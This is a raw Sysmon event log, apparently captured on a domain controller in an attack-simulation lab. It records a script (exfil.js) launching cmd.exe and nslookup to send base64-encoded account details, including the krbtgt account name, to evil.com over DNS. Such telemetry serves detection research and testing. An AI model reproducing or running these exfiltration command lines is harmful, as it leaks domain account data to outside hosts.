14:16:08.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.253{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F93D-000000005F02}3964C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.237{2E1864BB-17A8-629A-F73D-000000005F02}73687744C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-F93D-000000005F02}3964C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.252{2E1864BB-17A8-629A-F93D-000000005F02}3964C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-F73D-000000005F02}7368C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlljsq.tmp 2>&1 10341000x8000000000000000194776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.221{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-F83D-000000005F02}5700C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.221{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-F83D-000000005F02}5700C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.205{2E1864BB-17A8-629A-F83D-000000005F02}57004200C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-F73D-000000005F02}7368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.205{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F83D-000000005F02}5700C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.200{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.200{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F73D-000000005F02}7368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.200{2E1864BB-17A1-629A-783D-000000005F02}55524808C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-F73D-000000005F02}7368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.200{2E1864BB-17A8-629A-F73D-000000005F02}7368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlljsq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.184{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxfxrff.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.168{2E1864BB-17A8-629A-F53D-000000005F02}53802056C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-F63D-000000005F02}2388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.168{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.168{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.168{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.168{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.168{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F63D-000000005F02}2388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.168{2E1864BB-17A8-629A-F43D-000000005F02}49963500C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-F63D-000000005F02}2388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.173{2E1864BB-17A8-629A-F63D-000000005F02}2388C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-F43D-000000005F02}4996C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxfxrff.tmp 2>&1 10341000x8000000000000000194756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.152{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-F53D-000000005F02}5380C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.152{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-F53D-000000005F02}5380C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.152{2E1864BB-17A8-629A-F53D-000000005F02}53802056C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-F43D-000000005F02}4996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.137{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F53D-000000005F02}5380C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.137{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.137{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.137{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F43D-000000005F02}4996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.137{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 